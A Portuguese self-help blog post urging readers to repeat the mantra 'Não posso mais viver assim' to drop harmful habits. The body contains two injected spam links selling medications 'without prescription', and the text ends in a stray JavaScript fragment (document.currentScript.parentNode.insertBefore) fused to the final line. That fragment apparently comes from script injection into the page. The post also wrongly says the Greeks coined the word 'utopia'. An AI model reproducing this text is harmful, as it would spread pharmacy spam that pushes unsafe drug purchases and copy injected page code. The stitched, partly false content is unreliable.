Não posso mais viver assim… Palavras ditas com certa frequência e de maneira negativa. Já parou para refletir que elas podem ganhar um novo sentido em sua vida, como se fossem um mantra?

Mas, primeiro: você sabe o que é um mantra? Presente em orações e meditações, os mantras são instrumentos do pensamento que nos auxiliam a dissolver crenças negativas, velhos apegos ou até mesmo alcançar estados mais contemplativos – como é o objetivo de muitas filosofias orientais.

Tenho certeza que muita das vezes você se deparou com a frustração de estar praticando hábitos nada saudáveis e úteis para sua vida e simplesmente não saber o que fazer para mudá-los. Ou mais: atraindo uma série de situações negativas que apenas te atormentam.

Há muitas maneiras de se realizar isso. Dessa vez, optou-se por trazer um método menos ortodoxo que irá auxiliá-lo(a) nessa tarefa tão desafiadora: a de transformarmos a nós mesmos naquilo que realmente desejamos.

O mantra costuma ser utilizado por meio da repetição. É como instalar um novo hábito; apenas uma simples execução não será capaz de fixá-lo em sua mente e começar a transformá-la. É por isto que este artigo irá:

  • ensinar a você um mantra transformador e…
  • os motivos por traz desse mantra, assim como…
  • a maneira de utilizá-lo.

Não posso mais viver assim: ensinando o mantra

Como você deve ter observado no título, o mantra é não posso mais viver assim. Por estarmos tratando de um exercício, tais palavras não podem ser ditas de qualquer jeito. É necessário que sejam pronunciadas no exato momento – nem antes, muito menos depois. 

Qual momento é este? Aquele em que um hábito ou situação negativa da sua vida, que rebaixa sua autoconfiança, está pronto para ser executado e afundar ainda mais suas raízes em seu cotidiano. A metáfora para essa hora é a da luta interna: o diabo e o anjo que se digladiam pela dominância em suas ações.

É exatamente quando isto ocorrer, principalmente se você sentir que não será capaz de vencer, que o mantra deve ser pronunciado.

Muito simples, não é mesmo? Bom, há mais um ponto a ser mencionado: o mantra apenas terá efeito se o real significado dele estiver enraizado em seu cotidiano. Por esta razão, você agora irá entender o por que você não deve mais viver assim.

Você é um arquiteto da vida

Essas palavras são bem bonitas. Arquiteto…vida… Mas você realmente entende qual a implicação disso em sua existência?

Você é um ser humano: um ser de criatividade, não apenas atividade. Você e eu somos capazes de lidar com o futuro e partir dele sonhar com inovações até então inexistentes. Somos os únicos animais com o poder de mudar o ambiente natural ao nosso redor e darmos a ele a cara que desejarmos.

Faça esse pequeno exercício: pare e reflita sobre todas as coisas maravilhosas já criadas até hoje por nós, humanos. Pense das cavernas que um dia já habitamos para as casas que hoje podemos construir.  Use sua imaginação.

Agora sabendo de tudo isso, das maravilhas que fazem parte do nosso potencial, eu te pergunto: como é que você ainda está vivendo assim, sem trabalhar para mostrar todo o seu potencial? Fale para si mesmo, três vezes…

Não posso mais viver assim…

não posso mais viver assim

Há tempo de rasgar, tempo de costurar

Acredito que muitos conhecem essa frase, que vem do Eclesiastes – livro bíblico. Mais do que uma sentença religiosa, é também uma lição de vida. Comenta sobre a transitoriedade de tudo na vida e a possibilidade de sempre construir novas oportunidades. Porém, com um imperativo: é preciso primeiro livrar-se do que não presta mais (rasgar), para então transformar e criar novos caminhos (costurar).

Vamos aqui listar todos os hábitos e situações que atormentam? Irei mostrar uma lista que fiz há alguns anos, para que você tenha uma ideia do que estou falando:

  • pular refeições ao longo do dia por não conseguir parar de trabalhar
  • desesperar-se com facilidade quando as coisas não dão certo
  • não tomar decisões no momento preciso
  • fraquejar na hora de dar minha opinião sobre certos assuntos
  • permitir que os outros dessem limites para minha vida
  • assistir séries demais (eu era completamente viciado)
  • não encontrar um tempo para os meus amigos, nem para relacionamentos amorosos
  • trabalhar aos domingos
  • incapacidade de organizar o próprio tempo
  • extremo cansaço ao acordar

O que achou? Coloquei os dez principais motivos pelos quais decidi que não posso mais viver assim. Eu vivia de um modo como se algo como o destino pudesse estragar meus planos a qualquer momento – e era exatamente por isso que eu não os fazia. Até que em um determinado dia decidi construir novas e poderosas convicções.

No entanto, preciso te falar algo importante: mesmo após bom tempo, ainda tenho de me lembrar que não devo me envolver  com atitudes e situações que me atormentam. Por terem me acompanhado por longos anos, até hoje exercem certa disputa em minha vida. A frase “há tempo de rasgar, tempo de costurar” também remete a possibilidade de que ciclos aparentemente fechados retornem à campo. É por isso que jamais deixo de repetir…

Não posso mais viver assim…

não posso mais viver assim

Suas decisões valem mais que suas circunstâncias

A cada dia me convenço que podemos ser bem mais do que o ambiente em que vivemos. Tudo é uma questão de aprendizado, na verdade. Nossos comportamentos são plásticos e podem ser modificados com o adequado treinamento. É possível até mesmo alcançar bons níveis de uma determinada habilidade sem necessariamente ter lidado com a mesma anteriormente.

Uma dessas habilidades é o poder de decidir. Porém, não me refiro a decisões simples e corriqueiras do dia-a-dia, tais como: atravessar uma rua, pegar esse ou aquele ônibus. Tudo isso está no automático. Há algo que eu quero que também fique assim: o poder de tomar decisões relevantes.

A primeira delas é a de que você pode ser maior do que as circunstâncias que te cercam. Caso estas pareçam intransponíveis, então modifique o ambiente para que ele se adeque às suas necessidades. Em um caso muito extremo – porém por vezes necessário – deve-se até mesmo optar por afastar-se daquela circunstância restritiva e buscar uma melhor.

Poucos dão a real atenção nisso, porém o poder de decisão é exatamente o que faz com que nós, seres humanos, sejamos maiores do que qualquer noção de destino. Mal refletimos que a própria escolha de viver um destino específico é também uma decisão (provavelmente a mais importante de sua vida).

É preciso, portanto, que se exercite esse imenso poder. Que tal começarmos com…

Não posso mais viver assim. 

Você apenas deseja alcançar o prazer e fugir da dor

add in cart at low price medications no prescription – http://2941streetfood.com/add-in-cart-at-low-price-medications-no-prescription/
Algumas pessoas, ao escutarem ou lerem isto, sentem-se ofendidas. Imaginam que afirmar isso significa assumir nossa fragilidade. Mal sabem que nossas maiores fraquezas representam também as mais sublimes forças.

Este ponto é o que chamo de “encontro consigo mesmo”. Para mudar, é necessário compreensão. Ninguém cresce odiando-se ou culpando-se eternamente pelo o que fez ou deixou de fazer. Essa noção já passou do tempo de ser sepultada.

Todos os hábitos que você instalou até hoje, assim como as situações desnecessárias em que se envolveu, apenas entraram em sua vida pois o ajudaram a se sustentar emocionalmente com o stress do dia-a-dia. É provável que você tenha decidido não correr pois o ato lhe deixava muito cansado. Assistir três horas seguidas de série deve ter sido a única maneira encontrada para relaxar. Entrar em relacionamentos abusivos foi a única forma de achar afeto. A lista é imensa…

Portanto, não se culpe. Tudo de ruim (como de bom) possui um motivo. Certamente não foi porque você era estúpido ou incapaz; era apenas o que você podia dar naquele momento, naquela circunstância.

Porém, agora é diferente. Você já sabe que é possível obter níveis muito maiores de prazer, assim como afastar-se de dores completamente desnecessárias. Fazendo uma dieta adequada, sua corrida torna-se possível; exercitando-se, o stress diminuí e o dia fica mais leve. Dividindo o tempo de folga entre as séries e o yoga é uma excelente alternativa para regular o sono e mitigar as preocupações do dia.

O que acha da possibilidade de alcançar os mesmos objetivos com que os velhos hábitos foram construídos e também libertar-se dos efeitos negativos que estes causavam? Então diga…

Não posso mais viver assim…

A utopia: o lugar que ainda não se chegou

A palavra utopia possui diversos significados. O mais comum e popularizado deles é o de que determinada coisa é impossível. Logo isto caiu  no jargão do povo e a palavra (infelizmente) começou a ser utilizada como senso comum para descredibilizar iniciativas “grandiosas”, impensáveis para o ser humano médio.

Venho aqui lhe informar o grande equívoco que tem se cometido. A associação entre utopia como algo impossível foi uma das menos utilizadas pelos gregos, quando a inventaram. Outro significado, muito mais relevante, caiu em desuso: o de utopia como o lugar onde ainda não se chegou.

Percebeu a grande diferença?

Tudo o que é impossível diz respeito ao que não se pode alcançar. Está fora dos limites. Porém utopia também significa: o ideal perseguido e possível.

Portanto acredite em utopias, creia que transformações ocorrem e – se você está lendo esse texto – é provável então que já esteja vislumbrando mudanças concretas em sua vida. Basta lembrar que toda vez que você quiser desistir, nos momentos em que instalar novas hábitos e vencer circunstâncias adversas lhe parecer muito difícil, diga:

buy a cheap tablets without prescription – http://fenyitesu.mhs.narotama.ac.id/2016/11/30/buy-a-cheap-tablets-without-prescription/ Não posso mais viver assim! 

não posso mais viver assimdocument.currentScript.parentNode.insertBefore(s, document.currentScript);